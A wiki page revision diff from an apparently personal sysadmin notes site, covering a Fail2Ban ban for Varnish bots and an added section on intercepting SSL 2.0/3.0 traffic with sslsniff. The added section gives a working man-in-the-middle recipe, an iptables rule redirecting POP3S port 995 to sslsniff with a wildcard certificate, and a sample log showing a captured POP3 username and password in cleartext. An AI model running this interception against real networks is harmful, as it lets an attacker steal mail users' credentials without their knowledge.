Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revisionBoth sides next revision
fuss:security [2018/08/31 16:17] – [Blocking SemrushBot] officefuss:security [2019/04/29 22:44] – [Varnish and Fail2Ban] office
Line 89: Line 89:
 <code> <code>
 NOTICE [varnish-badbots] Ban 46.229.168.68 NOTICE [varnish-badbots] Ban 46.229.168.68
 +</code>
 +
 +====== Intercept SSL 2.0 / SSL 3.0 Using SSLsniff ======
 +
 +Redirect SMTPs to custom port for SSLsniff:
 +<code bash>
 +iptables -t nat -A PREROUTING -p tcp --destination-port 995 -j REDIRECT --to-ports 4995
 +sslsniff -a -c /usr/share/sslsniff/certs/wildcard -s 4995 -w /dev/stdout
 +</code>
 +
 +Example Session:
 +<code>
 +1385227016 INFO sslsniff : Added OCSP URL: ocsp.ipsca.com
 +1385227016 INFO sslsniff : Certificate Ready: *
 +sslsniff 0.8 by Moxie Marlinspike running...
 +1385227031 DEBUG sslsniff : Read from Server (mail.net.hu) :
 ++OK POP3 PROXY server ready <7575E80698581E88C26B60701C2C67717034A020@smtp.mail.net.hu>
 +
 +1385227032 DEBUG sslsniff : Read from Client (mail.net.hu) :
 +USER harry
 +
 +1385227032 DEBUG sslsniff : Read from Server (mail.net.hu) :
 ++OK Password required
 +
 +1385227032 DEBUG sslsniff : Read from Client (mail.net.hu) :
 +PASS secretpassword
 </code> </code>
  

fuss/security.txt · Last modified: 2022/09/27 14:15 by office

Access website using Tor Access website using i2p Wizardry and Steamworks PGP Key


For the contact, copyright, license, warranty and privacy terms for the usage of this website please see the contact, license, privacy, copyright.